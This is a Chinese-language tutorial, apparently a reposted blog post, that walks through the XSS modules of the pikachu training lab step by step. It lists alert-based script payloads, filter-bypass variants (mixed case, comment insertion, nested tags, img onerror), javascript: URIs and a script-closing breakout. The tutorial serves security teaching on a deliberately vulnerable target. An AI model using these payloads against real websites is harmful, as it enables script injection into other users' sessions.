++本篇文章旨在为网络安全渗透测试靶机复现教学。通过阅读本文,读者将能够对渗透pikachu靶场XSS跨站脚本攻击模块有一定的了解++
原文学习链接
CSDN博主:One_Blanks
主页地址:https://blog.csdn.net/NPSM_?type=blog
一、靶机资源下载
PHPStudy:
pikachu:
https://github.com/zhuifengshaonianhanlu/pikachu
二、反射型XSS(get)
1.1 提交框插入XSS检测代码
# xss口令:见框就插
<script>alert("XSS")</script>

1.2 burp suite抓包并找到传参点

1.3 burp suite改包后发送数据包,查看浏览器执行结果


1.4 方法二:修改前端输入框长度限制


三、反射型XSS(post)
1.1 爆破登录框
username=admin
password=123456



1.2 插入XSS检测代码
<script>alert("XSS")</script>


四、存储型XSS
<script>alert("XSS")</script>



五、DOM型XSS
# DOM型就是将XSS输入到标签属性中了,利用标签属性进行触发
javascript:alert(23)


六、DOM型xss-x
# DOM型就是将XSS输入到标签属性中了,利用属性进行触发
javascript:alert(23)

七、XSS盲打
1.1 插入XSS检测代码
<script>alert("xss")</script>

1.2 查看提示

1.3 根据提示进入登陆地址
http://192.168.60.181/pikachu/vul/xss/xssblind/admin_login.php
#根据自己靶机IP地址更换下IP


八、xss过滤
1.1 输入框输入XSS检测代码
<script>alert("xss")</script>

1.2 使用其他XSS检测代码尝试
大小写混淆过滤,<scRipt>alert(14)</sCript>
使用注释进行干扰: <sc<!--test--> ript> alert(14)</scr <--test--> ipt>
重写: <scri<script> pt> alert(14)</scri</script> pt>
使用img标签<img src=xss onerror="alert(11)">

九、 xss之htmlspecialchars
1.1 输入框输入XSS检测代码
<script>alert("xss")</script>

1.2 重新构造XSS检测代码
# htmlspecialchars()函数把预定义的字符转换为HTML实体
# &(和号)成为&
# "(双引号)成为"
# '(单引号)成为'
# <(小于)成为<
# '>'(大于)成为>
javascript:alert("XSS")

十、xss之href输出
javascript:alert("XSS")

十一、xss之js输出
1.1 插入xss检测代码
<script>alert(1)</script>

1.2 重构xss检测语句
</script><script>alert(1)</script>
# 前面多写一个</script>与网站代码中的<script>形成闭合,再去执行我们的<script>alert(xss)</script>
